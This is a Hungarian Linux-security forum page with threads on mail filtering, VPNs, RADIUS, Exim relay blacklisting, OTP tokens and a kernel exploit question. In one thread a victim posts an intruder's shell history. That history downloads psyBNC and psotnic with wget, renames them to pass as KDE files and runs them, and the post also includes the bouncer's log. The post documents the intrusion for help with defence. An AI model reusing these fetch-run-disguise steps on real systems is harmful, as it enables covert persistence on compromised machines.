Linux-security

Postfix, egyenlőre mindenféle szűrés nélkül :((

Fórumok

Sziasztok!

Mostmár új témát nyitok erre, mert egységben akarom látni a dolgokat.
Nagy problémám van, az éjjel egy beállítás miatt elvesztek levelek, másolatot meg nem tudok készíteni jelenlegi "felszereléssel". Több alternatívát képzelek el a "jövőben".

1. Marad az a megoldás ami most van, hogy kézzel töltögetem fel a body_checks és a header_checks fáljokat ÉS a spamnak ítélt leveleket törlés előtt le tudjam másolni egy spam nevű user mappájába például.

2. A header és body_checks-et hagyon a francba, csak a tuti spam fogalmakat hagyom benne (viagra, xanax) és megpróbálom használni a procmailrc-t és a spamasassin-t.
Nem tudom, hogy mi (milyen program) teszi a /home/~/Maildir-be a leveleket, de a main.cf-ben ez van beállítva: home_mailbox = Maildir/
procmail fel van telepítve, de én (tudatosan) nem használom. Nemtudom, lehet, hogy ő teszi a leveleket a Maildir-be? Sajnos ezt nemtudom.
A Spamassassin nincs feltelepítve, ezt meg kell tennem.

3. Szintén marad ami most van, és ha nem lehet ezzel a body|header_checks-es megoldással másolatot is készíteni, akkor csak a tuti spam-leveles szavakat hagyom benne, és ez van.

Kérlek titeket aki segíteni tud segítsen, mert ez fontos lene nekem. Természetesen googlizok is nem kell mondnani, de nem teljesen egyértelmű mindig amit olvasok és amiben nem bízok 100%-ig azt nem szívesen próbálgatom.

(Ha egy levelet a mailq-ba teszek akkor hogyan kézbesíthetem onnan kézzel?
Mert talán megoldás lehet a spam, de valós levélgyanús leveleket a queue-ba tenni és kézzel kézbesíteni. Ezt tudja a body_checks.)

Milyen VPN megoldást céges belső háló elérésére?

Fórumok

Üdv!

Adott a következő teljesen általános feladat: Céges háló belső ip címtartománnyal, Debian Sarge gateway, ettől független belső DHCP szerver. Meg kellene oldani, hogy netről windowsos gépekkel lehessen csatlakozni a belső hálóra VPN-el, a felhasználó számára a lehető legegyszerűbb módon, úgy, hogy lehetőleg ne glosszáljon a leglámább script-kiddie is ki meg be a tűzfalon ennek segítségével. Kereskedelmi megoldás is megfelelő.

Ki mit tud tanácsolni?

radius (freeradius)

Fórumok

Sziasztok,

Szeretnek egy radius+mysql autentikacioju WiFi-s AP-t csinalni, de nem nagyon talalok a google-n sem leirast. Van valakinek hasznalhato HOWTO-ra linkje ? Esetleg csinalt mar valaki ilyet ?

elore is koszi.

Hová megy a forgalom a tűzfalról?

Fórumok

Sziasztok!
Van nekem egy Linux-os iptables-ös tűzfalam, és mögötte egy Windows-os, meg egy Linux-os gép. Na a Windows-os gép elkapott valami nyavaját, és most éppen a teljes elérhető ADSL sávszélességgel nyom fölfelé valamit. Windows-ban semmi gyanús nem látszik, csak onnan tudom, hogyha a tűzfalon kilövöm a Windows-hoz menő hálókártyát, akkor megszűnik az ADSL felé menő forgalom.
Nem tudjátok, a tűzfalon meg lehet nézni, hogy mit küld föl a Windows-os gép, és főleg hová?
Köszi!

jelszó

Fórumok

Hy,

tudna-e segíteni abban, hogy megtaláljam azt az állományt, melyben Debian Sarge alatt beállíthatom a kotelezően megadandó jelszó hosszát?
Megengedi-e a Debian a 0 hosszúságú jelszót?

(Ha jól emlékszem a Samba a min passwd length = x beállítással szabályozhatja a kötelezően megadandó jelszó hosszát)

Köszönöm.

ecosse

Beslattyantak

Fórumok

Úgy tűnik valaki besétált az otthoni mindenes gépemre a VNC szerveren keresztül. Szerencsére csak felhasználói jogokat szerzett, nem úgy néz ki ezekből, hogy nagyon rombolni akart. Ezt tette shell-ben:


wget lalal
ls
cd video
cd /video
cd Video
ls
cd
cd Zone
cd /Zone
cd Zone
cd download
cd Download
ls
cd
ls
cd tmp
ls
cd kde tupa
cd kde-tupa
ls
wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
tar -xzvf psyBNC-2.3.2-7.tar.gz 
ls
rm -fr  psyBNC-2.3.2-7.tar.gz
ls
mv psybnc ksycocakrn
ls
cd ksycocakrn/
make
pico psybnc.conf
ls
pico psybnc.conf
jed psybnc.conf
jove psybnc.conf
epoch psybnc.conf
vim psybnc.conf
ls
cd tmp
ls
cd kde-tupa/
ls
cd ksycocakrn/
ls
pico psybnc.conf
psybnc
./psybnc
cd
cd kde-tupa/
cd tmp
cd kde-tupa/
ls
kill -9 29678
ls
rm -fr ksycocakrn/
ls
wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
rm -fr  psyBNC-2.3.2-7.tar.gz
wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
tar -xzvf psyBNC-2.3.2-7.tar.gz 
rm -fr  psyBNC-2.3.2-7.tar.gz
mv psybnc ksycocakrn
ls
cd ksycocakrn/
make
nano psybnc.conf
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
pico psybnc.conf
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
ls
pico psybnc.conf
vi psybnc.conf
kill -9 29870
cd tmp
cd kde-tupa/
cd ksycocakrn/
make
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
rm -fr psybnc.conf.swp
ls
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi -r psybnc.conf
vi psybnc.conf
cd tmp
vi -r psybnc.conf
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
ls
vin psybnc.conf
ls
vi psybnc.conf
./psybnc
kill -9 30596
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
make menuconfig
cd tmp
cd kde-tupa/
make menuconfig
cd ksycocakrn/
make menuconfig
menucodsaflkj
cd tmp
cd kde-tupa/
cd ksycocakrn/
menuconf
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
cd ksycocakrn/
vi psybnc.conf
cd tmp
cd kde-tupa/
vi psybnc.conf
cd ksycocakrn/
vi psybnc.conf

./psybnc
vi psybnc.conf
./psybnc
cd
cd kde-tupa/
cd tmp
cd kde-tupa/
wget http://friends.polibuda.info/~grusin/src/psotnic-current.tar.gz
tar -xzvf psotnic-current.tar.gz 
mv psotnic-current kdemard
ls
rm -fr psotnic-current.tar.gz
cd kdemard/
ls
./configure
make static
cd bin
vi sl
./psotnic -c sl
ls
./psotnic -c sl
mv sl sl.slave
./psotnic -c sl.slave
psotnic -c sl.slave
cd
ls
cd tmp
cd kde-tupa
ls
cd kdemard/
cd bin
ls
cd
cd tmp
cd kde-tupa
cd kdemard/
make static
cd bin
./psotnic -c sl.slave
vi sl.slave
./psotnic -c sl.slave
cd
cd kde-tupa
cd tmp
cd kde-tupa
cd kdemard/
./configure
make static
cd bin
./psotnic -c sl.slave
uptime
who
ls
cd tmp
l
cd kde-tupa/
ls
cd kdemard/
ls
cd bin
ls
psotnic -c sl.slave
cd
cd tmp
cd kde-tupa/
ls
rm -fr kdemard/
ls
wget http://friends.polibuda.info/~grusin/src/psotnic-current.tar.gz
ls
tar -xzvf psotnic-current.tar.gz 
cd psotnic-current
./configure
make
make static
cd bin
ls
make
cd
cd tmp
cd kde-tupa/
ls
rm -fr psotnic-current
rm -fr psotnic-current.tar.gz 
uptime

Ez pedig a telepített mórickaprogramjának a logja:


Tue Sep 12 13:48:56 :Listener created :0.0.0.0 port 4441
Tue Sep 12 13:48:56 :Can't create listening sock on host * port 4441 (bind)
Tue Sep 12 13:48:56 :SSL initialized
Tue Sep 12 13:48:56 :Loading all Users..
Tue Sep 12 13:48:56 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :31177)
Tue Sep 12 13:49:01 :User andrej () trying atw.irc.hu port 6668 ().
Tue Sep 12 13:49:01 :User andrej () connected to atw.irc.hu:6668 ()
Tue Sep 12 13:49:27 :connect from adshells.net
Tue Sep 12 13:49:35 :User andrej logged in.
Tue Sep 12 14:05:09 :User andrej quitted (from 193.77.238.37)
Tue Sep 12 14:25:11 :User andrej (_andrej) disconnecting from stoned server.
Tue Sep 12 14:25:11 :User andrej got disconnected from server.
Tue Sep 12 14:25:17 :User andrej () trying atw.irc.hu port 6668 ().
Tue Sep 12 14:25:17 :User andrej () connected to atw.irc.hu:6668 ()
Tue Sep 12 20:46:16 :connect from adshells.net
Tue Sep 12 20:46:19 :User andrej logged in.
Tue Sep 12 20:47:42 :User andrej quitted (from 193.77.238.37)

Nekem erről csak az jutott eszembe, hogy a francba. Valakinek eszébe jut valami más?

iptables esetleg így is lehet ?

Fórumok

Üdv Mindenki!

Az után érdeklődnék, hogy ami az IPCOP 1.3.0-ban vagyon iptables-beállítás, azzal érezheti-e gépem a biztonságot, vagy ezt ne is próbáljam átmásolni. Ha működne, akkor csak a változókat kéne behelyettesíteni (red,green interface -> eth0 és eth1. Vagy teljesen rosszul gondolom? Célom, hogy "mindent tilos, kivéve amit kifejezetten engedélyezek" című mutatvánnyal védjem a gépemet.

Várom megtisztelő válaszaitokat.

Tisztelettel: Bthomyka

HEELP DSBL listára kerültem (exim3)

Fórumok

Nem állítottam be Open Relay-t.
de nem volt bekapcsolva az mx elenörzés és a host lookup.
most bekapcsoltam ez elég?
-----------------------------------------------------------
# Specify the domain you want to be added to all unqualified addresses
# here. Unqualified addresses are accepted only from local callers by
# default. See the receiver_unqualified_{hosts,nets} options if you want
# to permit unqualified addresses from remote sources. If this option is
# not set, the primary_hostname value is used for qualification.

qualify_domain = mail.xxxx.hu

# If you want unqualified recipient addresses to be qualified with a different
# domain to unqualified sender addresses, specify the recipient domain here.
# If this option is not set, the qualify_domain value is used.

# qualify_recipient =

# Specify your local domains as a colon-separated list here. If this option
# is not set (i.e. not mentioned in the configuration file), the
# qualify_recipient value is used as the only local domain. If you do not want
# to do any local deliveries, uncomment the following line, but do not supply
# any data for it. This sets local_domains to an empty string, which is not
# the same as not mentioning it at all. An empty string specifies that there
# are no local domains; not setting it at all causes the default value (the
# setting of qualify_recipient) to be used.

local_domains = localhost:mail.gjw.hu:gjw.hu:10.0.0.0:mail.xxxx.hu:xxxxx.hu
# Allow mail addressed to our hostname, or to our IP address.

local_domains_include_host = true
local_domains_include_host_literals = true

# Domains we relay for; that is domains that aren't considered local but we
# accept mail for them.

relay_domains =xx.hu:xxxxx.hu

# If this is uncommented, we accept and relay mail for all domains we are
# in the DNS as an MX for.

relay_domains_include_local_mx = true

# No local deliveries will ever be run under the uids of these users (a colon-
# separated list). An attempt to do so gets changed so that it runs under the
# uid of "nobody" instead. This is a paranoic safety catch. Note the default
# setting means you cannot deliver mail addressed to root as if it were a
# normal user. This isn't usually a problem, as most sites have an alias for
# root that redirects such mail to a human administrator.

never_users = root

# The setting below causes Exim to do a reverse DNS lookup on all incoming
# IP calls, in order to get the true host name. If you feel this is too
# expensive, you can specify the networks for which a lookup is done, or
# remove the setting entirely.

host_lookup = *

# The setting below would, if uncommented, cause Exim to check the syntax of
# all the headers that are supposed to contain email addresses (To:, From:,
# etc). This reduces the level of bounced bounces considerably.

# headers_check_syntax

# Exim contains support for the Realtime Blocking List (RBL), and the many
# similar services that are being maintained as part of the DNS. See
# http://www.mail-abuse.org/ for background. The line below, if uncommented,
# will reject mail from hosts in the RBL, and add warning headers to mail
# from hosts in a list of dynamic-IP dialups. Note that MAPS may charge
# for this service.

#rbl_domains = rbl.mail-abuse.org/reject : dialups.mail-abuse.org/warn

# http://www.rfc-ignorant.org is another interesting site with a number of
# services you can use with the rbl_domains option

# The setting below allows your host to be used as a mail relay only by
# localhost: it locks out the use of your host as a mail relay by any
# other host. See the section of the manual entitled "Control of relaying"
# for more info.

host_accept_relay = 127.0.0.1 : ::::1 :kantor.xx.hu:*.xxx.hu:

# This setting allows anyone who has authenticated to use your host as a
# mail relay. To use this you will need to set up some authenticators at
# the end of the file

#host_auth_accept_relay = *

# If you want Exim to support the "percent hack" for all your local domains,
# uncomment the following line. This is the feature by which mail addressed
# to x%y@z (where z is one of your local domains) is locally rerouted to
# x@y and sent on. Otherwise x%y is treated as an ordinary local part

# percent_hack_domains=*

# If this option is set, then any process that is running as one of the
# listed users may pass a message to Exim and specify the sender's
# address using the "-f" command line option, without Exim's adding a
# "Sender" header.

trusted_users = mail:www-data

# If this option is true, the SMTP command VRFY is supported on incoming
# SMTP connections; otherwise it is not.

#smtp_verify = true

# Some operating systems use the "gecos" field in the system password file
# to hold other information in addition to users' real names. Exim looks up
# this field when it is creating "sender" and "from" headers. If these options
# are set, exim uses "gecos_pattern" to parse the gecos field, and then
# expands "gecos_name" as the user's name. $1 etc refer to sub-fields matched
# by the pattern.

gecos_pattern = ^([^,:]*)
gecos_name = $1

# This sets the maximum number of messages that will be accepted in one
# connection and immediately delivered. If one connection sends more
# messages than this, any further ones are accepted and queued but not
# delivered. The default is 10, which is probably enough for most purposes,
# but is too low on dialup SMTP systems, which often have many more mails
# queued for them when they connect.

smtp_accept_queue_per_connection = 200

# Send a mail to the postmaster when a message is frozen. There are many
# reasons this could happen; one is if exim cannot deliver a mail with no
# return address (normally a bounce) another that may be common on dialup
# systems is if a DNS lookup of a smarthost fails. Read the documentation
# for more details: you might like to look at the auto_thaw option

freeze_tell_mailmaster = true

# This string defines the contents of the \`Received' message header that
# is added to each message, except for the timestamp, which is automatically
# added on at the end, preceded by a semicolon. The string is expanded each
# time it is used.

received_header_text = "Received: \
${if def:sender_rcvhost {from ${sender_rcvhost}\n\t}\
{${if def:sender_ident {from ${sender_ident} }}\
${if def:sender_helo_name {(helo=${sender_helo_name})\n\t}}}}\
by ${primary_hostname} \
${if def:received_protocol {with ${received_protocol}}} \
(Exim ${version_number} #${compile_number} (Debian))\n\t\
id ${message_id}\
${if def:received_for {\n\tfor <$received_for>}}"

# Attempt to verify recipient address before receiving mail, so that mails
# to invalid addresses are rejected rather than accepted and then bounced.
# Apparently some spammers are abusing servers that accept and then bounce
# to send bounces containing their spam to people.

receiver_try_verify = false

# This would make exim advertise the 8BIT-MIME option. According to
# RFC1652, this means it will take an 8bit message, and ensure it gets
# delivered correctly. exim won't do this: it is entirely 8bit clean
# but won't do any conversion if the next hop isn't. Therefore, if you
# set this option you are asking exim to lie and not be RFC
# compliant. But some people want it.

accept_8bitmime = true

# This will cause it to accept mail only from the local interface

#local_interfaces = 127.0.0.1

# If this next line is uncommented, any user can see the mail queue
# by using the mailq command or exim -bp.

#queue_list_requires_admin = false

#
end

-----------------------------------------------------

Hogy lehet leszedni magamat? :-((
Elvileg "magátol" is lekerülök?

IP: 217.166.62.186
Input IP: xx.xx.xx.186
Transport: smtp
Message Received: 2006/08/27 11:56:24 UTC
Message Sent By: anonymous
Extended Information for Transport:
MAIL FROM:
RCPT TO:

Full Message:

Received: from xx.xx.hu ([10.0.0.20] helo=spamcheck.local) by mail.xxx.hu with smtp (Exim 3.36 #1 (Debian)) id 1GHJFl-0005CV-00 for
; Sun, 27 Aug 2006 13:56:38 +0200
Message-ID:
Date: Sun, 27 Aug 2006 11:56:32 +0000
To:
Subject: Open Relay Test Message
From: spam@spamcheck.local

This message is a test of your mail server to determine if
it will perform relaying (re-sending) of e-mail messages
for unauthorized outside parties. This capability, if
enabled in your mail server, is widely considered to be
serious flaw in mail server security.

Your mail server is being tested for relaying capability
because we have received mail from it and wish to determine
its likelihood to be abused by spammers.

Egy belépés - egy jelszó

Fórumok

HElló!

Láttam már olyan RSA által gyártott kulcstartókat amin egy számsor változott percenként és ezzel lehetett belépést nyerni különféle cégek géptermébe/számítógépbe. A probléma csak az vele, hogy amennyire én tudom 30E a legolcsóbb ilyen kütyü. Ami hát drága és bár nem értek hozzá szerintem indokolatalnul. A kérdésem az volna, hogy tudtok-e egy hasonló eszközt ami olcsó(bb) és működik linux alatt? A célom ha nem lenne egyértelmű az volna, hogy sok helyről kell bejelentkeznem a szerverre és a jelszólopást el kellene kerülnöm. Vannak workaroundok természetesen de borzasztó macerásak és nem is 100%-osak. (jelszócsere naponta stb.) Sokkal jobb volna egy ilyen megoldás aminél persze az algoritmus nem túl könnyen megfejthető.

Legutóbbi Linux kernel sebezhetőségek

Fórumok

A milw0rm.com-on megjelent exploitokat végignézve találtam egy Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit nevűt. Forrást letöltöttem, fordítottam, de nekem nem működik vanilla 2.6.11.12 kernellel. Tulajdonképpen csak az érdekelne, hogy a grsec /proc filesystemre vonatkozó védelmei megfelelőek-e erre az expoitra.